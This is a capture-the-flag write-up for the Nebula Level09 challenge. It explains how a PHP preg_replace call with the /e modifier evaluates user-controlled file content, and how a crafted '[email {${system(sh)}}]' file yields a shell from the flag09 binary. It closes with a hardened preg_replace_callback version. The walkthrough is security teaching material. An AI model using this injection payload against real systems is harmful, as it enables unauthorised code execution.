# Exploit-Exercises : Nebula
## Level09 - PHP preg_replace
Hi everyone! It's been a long time since the last tutorial. Today, this tutorial will focus on a vulnerable PHP application.
Let's begin!
### The source code
Nebula provides us with the PHP source code of the vulnerable app:
```php
<?php
// Replaces "." and "@" in an address with " dot " and " AT "
function spam($email)
{
    $email = preg_replace("/\./", " dot ", $email);
    $email = preg_replace("/@/", " AT ", $email);
    return $email;
}

// Reads a file and rewrites every "[email ...]" tag
function markup($filename, $use_me)
{
    $contents = file_get_contents($filename);
    // The /e modifier evaluates the replacement string as PHP code
    $contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);
    $contents = preg_replace("/\[/", "<", $contents);
    $contents = preg_replace("/\]/", ">", $contents);
    return $contents;
}

$output = markup($argv[1], $argv[2]);
print $output;
?>
```
Let's break the code into small pieces.
N.B.: the flag09 binary located in /home/flag09 runs this PHP script.
### Understanding preg_replace and PHP variables
How does it work?
There are two functions in this PHP code: spam and markup.
Here is the spam function:
```php
function spam($email)
{
    $email = preg_replace("/\./", " dot ", $email);
    $email = preg_replace("/@/", " AT ", $email);
    return $email;
}
```
This function simply rewrites the content of the $email variable:
- if the regex finds a ".", the function replaces it with " dot "
- if the regex finds a "@", the function replaces it with " AT "
Example: darlene@fsociety.com will output: darlene AT fsociety dot com
Now let's dive into the markup function:
```php
function markup($filename, $use_me)
{
    $contents = file_get_contents($filename);
    $contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);
    $contents = preg_replace("/\[/", "<", $contents);
    $contents = preg_replace("/\]/", ">", $contents);
    return $contents;
}
```
The markup function has two arguments: filename and use_me.
Forget the use_me variable; we will pass garbage data (ex: asdf, fsociety, unicorn) because this variable is never used.
filename is the path to our file. As you can see in the first regex, the function searches the file contents for a specific pattern:
`[email (.*)]`
If a string matches the regex in the preg_replace, for example:
- [email darlene@fsociety.com]
- [email eliot@fsociety.com]
- [email tyrell@e-corp.com]
- [email gideon@allsafe.com]
it captures the second group (the part after "email ") and passes it to spam by evaluating the replacement string, ex:
- spam("darlene@fsociety.com")
- spam("eliot@fsociety.com")
- spam("tyrell@e-corp.com")
- spam("gideon@allsafe.com")
and the spam function rewrites these emails, ex:
- darlene AT fsociety dot com
- eliot AT fsociety dot com
- tyrell AT e-corp dot com
- gideon AT allsafe dot com
### Exploiting preg_replace
Here is the problem with this piece of code:
```php
$contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);
```
The /e modifier makes preg_replace evaluate the second argument, with the captured group substituted into it, as a PHP expression. Whatever we put between "[email " and "]" therefore ends up inside the double-quoted string passed to spam(), where PHP interpolates variables.
Let's create our "hack file":
```sh
echo '[email {$filename}]' >/tmp/hack
```
Now when we run the flag09 binary on this file, the output will be:
```
/tmp/hack
```
Now let's exploit it to get a shell (the page's original payload was missing the closing brace of the `{${...}}` expression; it is restored here):
```sh
echo '[email {${system(sh)}}]' >/tmp/hack
```
This evaluates system("sh") while building the string, so the output is the return value of the system function: a shell.
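As an added example (not part of the Nebula source or this write-up), here is the same markup function rewritten with preg_replace_callback, which is the replacement for the /e modifier (deprecated in PHP 5.5 and removed in PHP 7.0): the captured group reaches spam() as plain text, so the `{$filename}` hack file above is echoed back literally instead of being evaluated. The function name markup_safe and the temporary file are my own choices.

```php
<?php
// Added example: a hardened markup() using preg_replace_callback() instead of
// the /e modifier. The match is handed to a PHP closure as an array of strings,
// so no part of the file content is ever parsed or evaluated as PHP code.

function spam($email)
{
    $email = preg_replace("/\./", " dot ", $email);
    $email = preg_replace("/@/", " AT ", $email);
    return $email;
}

function markup_safe($filename)
{
    $contents = file_get_contents($filename);
    // [^\]]* instead of .* so the capture stops at the first closing bracket
    // rather than swallowing everything up to the last "]" on the line
    $contents = preg_replace_callback(
        '/\[email ([^\]]*)\]/',
        function ($m) { return spam($m[1]); },
        $contents
    );
    $contents = preg_replace("/\[/", "<", $contents);
    $contents = preg_replace("/\]/", ">", $contents);
    return $contents;
}

// Constructed sample input: the "hack file" line from above plus a normal tag.
// In a single-quoted PHP string, {$filename} is literal text, exactly as it
// would be after echo '...' >/tmp/hack in the shell.
$tmp = tempnam(sys_get_temp_dir(), 'markup');
file_put_contents($tmp, '[email {$filename}]' . "\n" . '[email darlene@fsociety.com]' . "\n");

print markup_safe($tmp);
unlink($tmp);
?>
```

The first line comes back unchanged because spam() only touches "." and "@"; only the second line is rewritten, and nothing in the file is interpolated or executed.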
The next tutorial will cover a race condition exploit.